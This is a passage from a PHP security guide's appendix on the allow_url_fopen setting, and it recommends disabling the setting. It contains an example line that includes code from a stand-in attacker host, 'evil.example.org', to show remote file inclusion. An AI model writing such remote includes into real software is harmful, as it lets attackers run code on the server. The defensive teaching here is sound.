A.1. allow_url_fopen

As illustrated in Chapter 6, the allow_url_fopen directive allows you to reference remote resources as if they are local files:

    <?php

    $contents = file_get_contents('http://example.org/xss.html');

    ?>

Chapter 5 reveals how dangerous this is when combined with the use of include or require:

    <?php

    include 'http://evil.example.org/evil.inc';

    ?>

I recommend disabling allow_url_fopen unless your application requires it.